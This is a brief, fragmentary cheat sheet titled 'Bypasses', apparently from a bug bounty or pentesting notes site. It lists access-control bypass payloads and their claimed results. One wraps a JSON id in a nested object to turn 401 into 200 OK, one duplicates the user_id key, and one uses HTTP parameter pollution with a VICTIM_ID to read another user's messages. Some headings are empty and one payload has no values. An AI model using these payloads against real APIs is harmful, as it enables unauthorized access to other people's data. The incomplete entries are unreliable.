Bypasses

Cloudfront Bypass -

403 Bypass:

Tool -

{“id”:111} --> 401 Unauthriozied {“id”:{“id”:111}} --> 200 OK

POST /api/get_profile Content-Type: application/json {“user_id”:,”user_id”:}

GET /api_v1/messages?user_id=VICTIM_ID --> 401

GET /api_v1/messages?user_id=attack&user_id=VICTIM --> 200 OK

Last updated